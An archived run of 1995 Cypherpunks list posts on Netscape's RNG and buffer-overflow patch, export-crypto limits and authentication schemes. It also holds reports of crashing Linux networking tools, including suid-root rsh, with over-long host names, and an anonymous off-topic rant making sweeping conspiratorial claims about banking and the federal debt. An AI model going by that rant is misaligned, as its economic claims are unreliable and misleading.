 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Wed, 27 Sep 95 22:16:58 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Patch release of Netscape available
In-Reply-To: <199509280458.AAA27626@clark.net>
Message-ID: <306A2FA6.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell wrote:
>   Does this release patch both the RNG and the overflow bugs or just
> the RNG?

Both. We fixed the overflow bugs we could find, including all the
examples mailed to cypherpunks.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 15:28:27 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
In-Reply-To: <199509261941.MAA02266@ix6.ix.netcom.com>
Message-ID: <44cj4k$oee@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509261941.MAA02266@ix6.ix.netcom.com>, stewarts@ix.netcom.com (Bill Stewart) writes:
> >>Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> >>data used to keep PGP secure,  Netscape will be banned from my computer
> >>and every computer I am responsible for. -- For good.
> >
> >This is the second person who has expressed this sentiment. I don't
> >understand it. If you believe that the possibility of randseed.bin
> >getting out is dangerous, then why do you leave it online? Do you
> >really trust every piece of software you run, every piece of software
> >that can possibly access your machine over the net, to not look at
> >that file?
> 
> It makes a little bit of sense - I'm not aware of any software,
> other than PGP and now Netscape, that _explicitly_ goes after randseed.bin,
> though of course just about anything can try.  

  Netscape will not read randseed.bin.  I've changed it to use an environment
variable that names a user specified file to read.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Wed, 27 Sep 95 22:40:30 PDT
To: Bill Stewart <jlasser@rwd.goucher.edu>
Subject: Re: "Notes" to be Eclipsed by "Netscape"
Message-ID: <v02110101ac8fb13b4275@[17.255.9.110]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:21 9/27/95, Bill Stewart wrote:

>Notes was a PC network reimplementation of PLATO, the system that also inspired
>notesfiles, a distant cousin of Netnews (though I'm not sure if netnews was
>originally inspired by PLATO or not...)  Netnews assumes that articles are
>going to propagate for a while and then be trashed; notesfiles assumes you're
>building a knowledge bases that sticks around.  (This transitoriness has
>allowed
>netnews to scale to its current N*100MB/day of trash :-)

Netnews was the old "msgs" program on serious steroids - the thing everyone
was supposed to run in their .login (or .profile) scripts to get
system-wide announcements. My bet is that msgs was inspired by the
TOPS-20/ITS equivalents at MIT. Netnews subsequently underwent relatively
rapid forced evolution in its early days to meet the scaling demands of the
UUCP network, and the Internet of that time (~1983).

The "notesfiles" system from UIUC that Rob Kolstad and Ray Essick wrote was
not so much a distant cousin of NetNews as it was a similar system designed
to solve the same problem (distributed message-based computer
conferencing); I would argue that NetNews had the better transports and
backends, but notesfiles was one or two up on NetNews in UI features
(message threads, etc). The two were sufficiently close that (bad) gateways
were written to move messages from one system to the other.

With any luck, the next round of NetNews user interfaces will remove all of
the UI advantages of notesfiles - the hooks have always been there, but
writing good UI's hard work, and most NetNews hackers (me included) have
had more fun/luck/interest in hacking the transport level to be ever more
slightly efficient.

>AT&T Network Notes is a joint AT&T/Lotus project that uses AT&T's public IPX
>network
>to support Notes on; I think it's now rolled out an accepting customers,
>but it was mostly in press-release stage while I was at AT&T.

I had the impression from what I read that this was going to be an IPX WAN,
and that after announcing this Brave New Service, the partners discovered
just how poorly IPX behaves on a WAN, and so have backed out to Notes on IP
for this thing. I haven't heard much about it since, but I'd be surprised
to find AT&T being foolish enough to try and operate an IPX WAN.

>Notes does have encryption, using RSA and I think RC4; I'm not sure if they
>do the
>40 bits exportable/ 128 domestic bit or just use 40 bits.  Don't know about
>overflow
>kinds of bugs; the bugs I've heard about were more problems integrating with
>Cc:Mail :-)

Lotus is indeed one of RSA's licensees; I remember reading that in the WSJ
at about the same time that Apple became one.

I still place my message-based distributed collaboration bets on NetNews
technology, or some obvious derivative of it.

Erik Fair







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 15:45:42 PDT
To: cypherpunks@toad.com
Subject: Re: Golden Coy Freeh
In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com>
Message-ID: <44ck51$q0n@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509251253.IAA07006@pipe4.nyc.pipeline.com>, jya@pipeline.com (John Young) writes:

>    Mr. Freeh wisely did not say whether the F.B.I. agents were
>    able to decipher the encrypted files seized in the
>    investigation. It would be foolhardy, from a
>    law-enforcement perspective, to tip one's hand.

  Maybe someone should file an FOIA request on this...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 16:39:53 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <445hej$h03@tera.mcom.com>
Message-ID: <44cnah$q0n@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509251135.HAA13693@frankenstein.piermont.com>, perry@piermont.com (Perry E. Metzger) writes:

> Jeff Weinstein writes:
> > > ... would be nice if we could get 128 bit keys, though ... (hint,
> > > hint).
> > 
> > We are working this issue with the government.  As soon as we can
> > make it available for download we will.

> In other words, we will never see it in our lifetimes -- the
> bureaucreeps aren't known for promoting the spread of strong crypto.

  Where did I imply that if the govt. ignored us or said no that we
would meekly go away with tail between legs?

> By the by, are you guys going to be taking any action vis a vis the
> discovery of weak keys in RC4?

  We are talking to RSA about this, since our crypto code is based
on BSAFE code we got from them.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 27 Sep 95 20:44:36 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil>
Message-ID: <199509280344.XAA25414@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell writes:
# I've found a Netscape bug which I suspect is a buffer overflow and 
# may have the potential for serious damage. 

Mike D. writes:
> Is there any way to avoid/prevent this problem by changing options in 
> NetScape?

I'm afraid there's no way to completely eliminate the problem without getting
the next version of Netscape. There's no apparent way to increase the size of 
the buffer allocated for a URL at runtime. Of course, that would only be of
limited use. Certainly there's no way for a user to really fix the problem by
adding a check on the length of the URL.

However, a certain amount of common sense will go a long way in avoiding ugly
incidents. To put it simply, "look before you leap". Before you click on a
link, look at the status bar at the bottom of the Netscape window (in the
Unix version at least) that displays the URL of the link under the pointer.
To be safe, if it's too long to fit entirely in the status bar, view the
source of the current page to find the complete URL. (Note that when a URL is
too long to fit completely in the status bar, a middle portion of it is elided
with "...")

Also, if the link is labelled "Don't click here !" like one on my homepage,
don't click there ! :}

-Futplex <futplex@pseudonym.com>
"What if you knew her, and found her dead on the ground ?
 How can you run when you know ?" -Neil Young



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 27 Sep 95 22:40:32 PDT
To: cypherpunks@toad.com
Subject: Netscape seems to fix the overflow bug
Message-ID: <v01510100ac8ff3256300@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Simple testing with the Netscape update would seem to indicate that the
overflow bug has been fixed. How about the RNG hole?



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMGpDRHIf3YegbdiBAQFf4wJWIaseQP3CL4V7aEs8HMmU4MB2jYVpyLhx
C4ER+a9Ho9bIbaipATtuL+E0oaq77AEeaB7TMQBl+upzcttifH9Y9hANYUQ7Q8vS
jkRa
=wN48
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 27 Sep 95 21:58:52 PDT
To: karlton@netscape.com (Phil Karlton)
Subject: Re: Patch release of Netscape available
In-Reply-To: <14494.812260307@ghoti.mcom.com>
Message-ID: <199509280458.AAA27626@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On ftp://ftp.netscape.com/pub/netscape, you can find the new UNIX,
> Macintosh and Windows executables. Note that these executables only
> support 40-bit RC4. We are working out a mechanism to be able to
> upgrade the 128-bit versions that is acceptable to the U.S.
> government.

  Does this release patch both the RNG and the overflow bugs or just
the RNG?

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 27 Sep 95 22:58:13 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Problems with netscape patch and W95
Message-ID: <Pine.ULT.3.91.950928005444.16671A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I thought I'd post this here since there is a netscape dude hanging 
around :-)

I downloaded teh patch for the 32-bit windoze version and couldn't get it 
installed.  I had the old installation in the default C:\Program 
Files\Netscape\Navigator (with the space in the directory name), but 
every incarnation I tried, including the Progra~1 8.3 name couldn't be 
found.  I finally just stripped out the old an reinstalled the new.  
Anooying but functional.  Please double check this in any future patches, 
or better yet, put in a seach utility that finds it for you, something 
like "Netscape was found in C:\Foo\Bar.  Patch here?"  If no, then search 
more until exhausted.

Sorry for the non-CP traffic, just trying to reach the right people the 
fastest. :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMGoddDokqlyVGmCFAQFQwAP/ZbC46g8gdZ1l+QEXjKz7MtLW/WNNlBGI
CCO8A0pmescH1uP9vfSMt2gfuR59DMHsVNSjloY0AO0LWSqLSnlHO4JOMajhysOZ
hnpL63BtrR50o3RBoZ8awqx0h+LWjm3U9gh9m0xcsq3vB67a7VW3m9CpJ3yRWQVJ
usZ7HyjcHEE=
=mva0
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 27 Sep 95 22:59:17 PDT
To: cypherpunks@toad.com
Subject: Mathematics Library Plus -- Interactive Math Tutorial (fwd)
Message-ID: <199509280612.BAA07163@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
From benjie@relay.net Thu Sep 28 00:35:53 1995
Apparently-To: <student.tc.umn.edu!klis0001@amdahl.com>,
        <students.uwlax.edu!bonin_rl@amdahl.com>,
        <students.uwlax.edu!gaspa_jo@amdahl.com>,
        <students.uwlax.edu!knuts_tp@amdahl.com>,
        <students.uwlax.edu!patzn_kj@amdahl.com>,
        <students.uwlax.edu!ring_dj@amdahl.com>,
        <sun.com!sol.lederman@amdahl.com>,
        <sun10.vsz.bme.hu!s4062alm@amdahl.com>,
        <sundance.sjsu.edu!full9172@amdahl.com>,
        <sunfse.ese.lmsc.lockheed.com!jimt@amdahl.com>,
        <sunsinger.ipfw.indiana.edu!guy@amdahl.com>,
        <swanage9.demon.co.uk!bill@amdahl.com>,
        <tamsun.tamu.edu!jow5904@amdahl.com>, <tekelec.com!amy@amdahl.com>,
        <ti.uni-trier.de!jukna@amdahl.com>, <tiac.net!ram@amdahl.com>,
        <timken.com!fearn@amdahl.com>, <tpki.toppoint.de!freitag@amdahl.com>,
        <tyrell.net!dsg@amdahl.com>, <udcf.gla.ac.uk!901732ca@amdahl.com>,
        <udcf.gla.ac.uk!gamv29@amdahl.com>,
        <ultramac.oui.com!sawtelle@amdahl.com>, <umd5.umd.edu!ssw@amdahl.com>,
        <uran.informatik.uni-bonn.de!hermann@amdahl.com>,
        <utkvx1.utk.edu!ckc@amdahl.com>, <vax.micron.com!cbreen@amdahl.com>,
        <vaxc.hofstra.edu!K12BAYKJ@amdahl.com>,
        <vaxc.hofstra.edu!mchong1@amdahl.com>,
        <vern.bga.com!ravage@amdahl.com>, <village.ca!keitbalk@amdahl.com>
Message-Id: <m0syBKR-0005j2a@hip-hop.hh.sbay.org>
Date: Wed, 27 Sep 95 22:16 PDT
Sender: benjie@relay.net (Cyber Robot)
From: coe@best.com (C.O.E)
Subject: Mathematics Library Plus -- Interactive Math Tutorial
Designated-To: Internet Amateur Mathematics Society
Replied-From: Internet Amateur Mathematics Society
Precedence: bulk
Sender: iams@hh.sbay.org (Internet Amateur Mathematics Society)
X-Info: email to listserv@hh.sbay.org with "FAQ iams" in the message
X-Ignore: iams  Ignore this line. It's a mailing-list-loop detector.


The Mathematics Library Plus Series include five (5) CD-ROM titles
featuring Algebra, Calculus, Statistics, Geometry, and Trignometry
Each CD-ROM title is a compendium of scientific and mathematical 
equations. Each listing explains the fundamental principle(s), 
corollaries of the equation and its sample usage. 

Each CD-ROM title is a step-by-step and easy-to-follow interactive 
tutorial software for students from high school to college levels. 
A comprehensive self study guide with online text references and a 
useful resources for pre-test practices. Hundreds of problems ranging
from easy to difficult and come with interactive hints and solutions. 

For more info, please visit

	http://www.coe.com/ari/

To download a copy of the MLP sampler, use anonymous ftp to

	ftp.coe.com

Under the directory,

	pub/outgoing/mlp


Thank you.

info@coe.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cort <cort@ecn.purdue.edu>
Date: Wed, 27 Sep 95 23:13:18 PDT
To: cypherpunks@toad.com
Subject: Re: NIS library code exposure (Unix network exposure)
In-Reply-To: <14539.812260953@ghoti.mcom.com>
Message-ID: <199509280613.BAA21957@en.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


[....]

> Do you have any daemons that run as root and do networking? Are you
> sure that all of them check the length of the host name before passing
> it to gethostbyname?

[....]

On Linux:
ping [huge host name] works
ftp [huge host name] works
finger [huge host name] works
nslookup [huge host name] ... CRUNCH (Segmentation fault)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 01:39:32 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <199509280839.BAA02982@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:44 PM 9/27/95 -0400, Futplex <futplex@pseudonym.com> wrote:
>However, a certain amount of common sense will go a long way in avoiding ugly
>incidents. To put it simply, "look before you leap". Before you click on a
>link, look at the status bar at the bottom of the Netscape window (in the
>Unix version at least) that displays the URL of the link under the pointer.

One of the later versions of the hack hid the large href inside the page
as an IMG; the URL for the page looked mostly harmless (other than being
named "bug2" or "hack2" :-); I think it was Ray's.  Blowed up real good.

"Push to test" ..... "Release to detonate"


>"What if you knew her, and found her dead on the ground ?
> How can you run when you know ?" -Neil Young
Well, Nixon's not coming any more, but this is it, we're on our own...
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 01:40:08 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Looking for advice.
Message-ID: <199509280839.BAA03015@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:58 PM 9/27/95 -0700, you wrote:
>For two programs communicating via TCP/IP and exchanging authentication
>information, I want to make sure that the authentication info, (user's
>name and password,) doesn't pass in the clear.  I can think of a few
>ways to handle this.  
>
>1) Encrypt via shared key using symetric encryption.
>   This works but key management is a problem.
>2) Encrypt via public keys using public key encryption.
>   There's licensing issues, and how do you generate public and private
>   pairs for all of the programs?  That could be a lot of primes!
>3) The "server" could keep user names and passwords stored as hashed values.
>   That way the "client" could do a hash (MD5?) before sending it.
>   This has the drawback of the server not having access to the unhashed
>   values...if it needs that access this method won't work.

[Perry Metzger often has good comments about the order of doing things in.]

Are you planning to encrypt your sessions, or not?  What threats are you 
worried about?  What threats are you aware of but not worried about?
How much opportunity do the users of the programs have to set up communications
beforehand?  Is this one-shot, or will a given client and server do a lot
of repeat business?  Are you concerned about privacy from machine to machine,
or also from user to user?  Are you worried about man-in-the-middle attacks?
Are you worried about protecting the user's name, or only their password?
Are you willing to buy hardware, or do you want software-only?
How critical is setup speed?  How slow are your processors?
Are you worried about your TCP sessions getting hijacked once you've
done the authentication?

For some applications, Diffie-Hellman is a good answer - the basic protocol
doesn't do authentication, but does do secure key negotiation as long as you
either don't have a man-in-the-middle or else have authentication such as
digital signatures on your key-parts.  Once you've created a shared key
by DH, you can then use it to encrypt your session, or at least exchange 
passwords securely.

If you're willing to buy a bit of hardware, there are cryptographic smartcards
that let you generate time-varying one-time passwords; some of them are decent.

Phil Karn's S/Key technology (ftp-able from and I think patented by Bellcore)
takes a nice approach using hash functions - let h^n(m) denote message m cranked
through hash function h n times, = h(h(h(...(h(m))...))), where h is a secure
one-way hash like MD4 that's tolerably fast.  To set up, calculate h^n(m),
and store it in the server's password file.  When you log in for the first time,
the server tells you n-1, you calculate h^(n-1)(m), send it as your password,
the server hashes it to get h^n(m), and compares it with the saved value.
If it works, the server now saves h^(n-1)(m); the next time it'll ask you for
n-2, you give it h^(n-2)(m), the server hashes to get h^(n-1)(m), etc.
Obviously you've got to reset after n-1 uses.

If you have an environment where you can store secret keys safely on the server,
you can use secret-key challenge-response methods effectively - the server
sends a random number, and you send back the number, encrypted, or there are
variants where you modify the number by 1, with or without timestamps,
and maybe the server sends the number encrypted also.  If you can't secure
a general-use machine, but are able to secure a machine that just does
authentication and keep it locked in a room with only network access and power,
pretty soon you've invented Kerberos.

Do you need separate public keys for each application X user?  Depending on what
you're trying to authenticate, you could have a public key for the application
or even just the machine it runs on, and send passwords encrypted with that;
again there are variants with timestamps, random challenges, etc., to deal
with issues like replay attacks.  Or maybe you can have the server issue
random numbers as challenges that you sign with your registered public key.
If you do that, though, better have the server sign with _its_ public key also,
since you'd probably rather not just go signing any random number anybody
hands you.  And what if there's a man in the middle there helping you log on...?
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cort <cort@ecn.purdue.edu>
Date: Thu, 28 Sep 95 00:11:51 PDT
To: cypherpunks@toad.com
Subject: Re: NIS library code exposure (Unix network exposure)
In-Reply-To: <199509280613.BAA21957@en.ecn.purdue.edu>
Message-ID: <199509280711.CAA27138@en.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


> [....]
> 
> > Do you have any daemons that run as root and do networking? Are you
> > sure that all of them check the length of the host name before passing
> > it to gethostbyname?
> 
> [....]
> 
> On Linux:
> ping [huge host name] works
> ftp [huge host name] works
> finger [huge host name] works
> nslookup [huge host name] ... CRUNCH (Segmentation fault)
> 

Ouch.....!

On Linux:
rsh [huge host name] crashes bad... (file system now corrupted)

The above claims for ping, ftp and finger may be dependent on how
huge is huge.  rsh took a very large number (I'm guessing 10 lines,
800 characters) before crashing.  Huge was not this huge for the
previous tests.

rsh is usually suid root.

I must quit experimenting now.... and repair my system.

Crypto relevance:  little....  some hack relevance, lots of general
                   system/network security relevance

Cort.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Thu, 28 Sep 95 03:52:26 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: It's Wednesday
In-Reply-To: <Pine.SUN.3.91.950928064141.6955B-100000@panix.com>
Message-ID: <9509280348.ZM151@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 28,  6:43am, Duncan Frissell wrote:
> Subject: Re: It's Wednesday
> 
> On 28 Sep 1995, Jeff Weinstein wrote:
> 
> >   Sure.  Its on ftp://ftp.netscape.com/pub/netscape.  It has been there
> > for several hours.
> 
> Late Wednesday.  Of course whoever created the directories/files had his 
> machine date set to *1994* so some of same are date stamped Tuesday 
> September 27 1994.

  They were put up some time between 4 and 6pm PST.  As far as I can
tell, all of the files are dated in 1995.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Sep 95 01:51:58 PDT
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199509280611.HAA02214@utopia.hacktic.nl>
Message-ID: <199509280851.EAA20863@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Whomever you are, could you get this shit out of Cypherpunks? This
list is about cryptography, not your ignorance of economics or how
banking works.

Anonymous writes:
> that they do. 95% of all "cash" transactions in the U.S. are by check.
> Checks are thus effectively also currency. The banker creates the so-
> called "loan" by writing a check or deposit slip, not against actual
> money, but against your promise to pay back the loan. The only cost to the
> bank is the paper,ink, and a few dollars in salaries and office costs for
> each tansaction. It is "check-kiting" on an enormous scale! The profits
> are enormous as shown below.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 22:41:42 PDT
To: cypherpunks@toad.com
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <v02120d06ac8f74e7796e@[199.2.22.120]>
Message-ID: <44dcgs$b36@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d06ac8f74e7796e@[199.2.22.120]>, cman@communities.com (Douglas Barnes) writes:
> As for objections about how worthwhile this is, it's pretty clear
> that a patch will be available for this problem before we can finish
> and publicize an exploit. This is not, however, the last piece of
> network software that will contain problems of this sort, and it is
> a good idea to build up expertise in this area. I'd also suggest going
> after some of the other browsers... I know, for instance, that AOL's
> browser dies horribly on these same sort of URLs.

  The patched version is now available at ftp://ftp.netscape.com/pub/netscape/

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 22:48:34 PDT
To: cypherpunks@toad.com
Subject: Re: It's Wednesday
In-Reply-To: <199509271646.MAA06516@panix.com>
Message-ID: <44dcts$b36@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509271646.MAA06516@panix.com>, frissell@panix.com (Duncan Frissell) writes:
> Do you know where your new Netscape is?

  Sure.  Its on ftp://ftp.netscape.com/pub/netscape.  It has been there
for several hours.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 22:49:54 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil>
Message-ID: <44dd09$b36@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil>, donlonm@ccmail.mcclellan.af.mil writes:
> Ray,
> 
> You wrote:
> 
> >I've found a Netscape bug which I suspect is a buffer overflow and 
> >may have the potential for serious damage. If it is an overflow bug, 
> >then it may be possible to infect every computer which accesses a web 
> >page with Netscape. 
> 
> Is there any way to avoid/prevent this problem by changing options in 
> NetScape?

  Just get the fixed version, or a patch from:

ftp://ftp.netscape.com/pub/netscape/

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 28 Sep 95 03:43:55 PDT
To: Jeff Weinstein <jsw@neon.netscape.com>
Subject: Re: It's Wednesday
In-Reply-To: <44dcts$b36@tera.mcom.com>
Message-ID: <Pine.SUN.3.91.950928064141.6955B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On 28 Sep 1995, Jeff Weinstein wrote:

>   Sure.  Its on ftp://ftp.netscape.com/pub/netscape.  It has been there
> for several hours.

Late Wednesday.  Of course whoever created the directories/files had his 
machine date set to *1994* so some of same are date stamped Tuesday 
September 27 1994.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:11:31 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509280611.HAA02214@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


that they do. 95% of all "cash" transactions in the U.S. are by check.
Checks are thus effectively also currency. The banker creates the so-
called "loan" by writing a check or deposit slip, not against actual
money, but against your promise to pay back the loan. The only cost to the
bank is the paper,ink, and a few dollars in salaries and office costs for
each tansaction. It is "check-kiting" on an enormous scale! The profits
are enormous as shown below.

                 THE COST TO YOU? PRACTICALLY EVERYTHING

   In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen.
State and local debts were practically non-existent, and government was
small and not oppressive.

   By 1920, after only six years of the Federal Reserve handling our
currency, the federal debt had jumped to $24 billion - $228 per citizen.
The Federal Government began to grow like an invisible cancer in its ear-
ly stages.

   By 1968 the federal debt had jumped to $347 billion - $1,717 per cit-
izen. Ten years later, by 1978 it had doubled again to $763 billion
- $3,500 per citizen. That is a debt of $17,500 for every family of five
in America. Federal debt has been growing faster and faster since. And
the Federal Government has become a debilitating cancer rapidly sapping
and weakening its victim.

   Today in 1992 the federal debt is over $4 trillion. (And they "cook the
books" on the low side to come up with that figure - see Chapter Nine.)
The $4 trillion national debt amounts to $16,000 per citizen, or $80,000
per family of five. And if that debt were calculated in terms of working
or tax-paying families, it would be considerably higher. The Federal Gov-
ernment has become a bloated, out-of-control parasite, a terminal cancer.
The economy seems so weak that even after many months of blowing up the
currency supply, signs of recovery have to be searched for. The entire
system may be on the brink of complete collapse.

   The above figures do not include state, municipal, school district,
business, or personal debts, which total an additional $3 trillion. Total
debt in America is thus over $7 trillion - $28,000 per citizen - $120,000
per family of five. This is more than twice the assessed value of all the
land and buildings in America. Effectively all of America has been signed
over to the bankers. They can take America and we would still owe them
another America! Of course, it is to their advantage not to take actual
title to the property, so we will not realize that we really own nothing.
Instead they leave us with "ownership" so we will willingly continue to
work and pay ever higher tributes to the bankers.

   What we really have is national bankruptcy. Let me repeat the words of
Senator John Danforth:
   "I have never seen more senators express discontent with their jobs..
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this won-
derful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy.... We
have defrauded our country to get ourselves elected."

         THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS

   To grasp the fact that periodic withdrawal of currency through interest
payments to the bankers will inexorably transfer all wealth in the nation
to the receivers of interest, imagine yourself in a poker or dice game.
Everyone has to buy chips (the medium of exchange) from a "banker" who
does not risk chips in the game, but watches the table and every hour rea-
ches in and takes 10% to 15% of all the chips on the table. As the game
progresses, the number of chips in the possession of each player will go
up and down with his or her "luck." However, the total number of chips
available to play the game (carry on business and trade) will decrease
steadily, while the "banker's" mountain of chips just grows and grows.

   The game will get low on chips, and some players will run out. If they
want to continue to play, they must buy or borrow more chips from the
"banker." The "banker" will sell (lend) the player more chips only if the
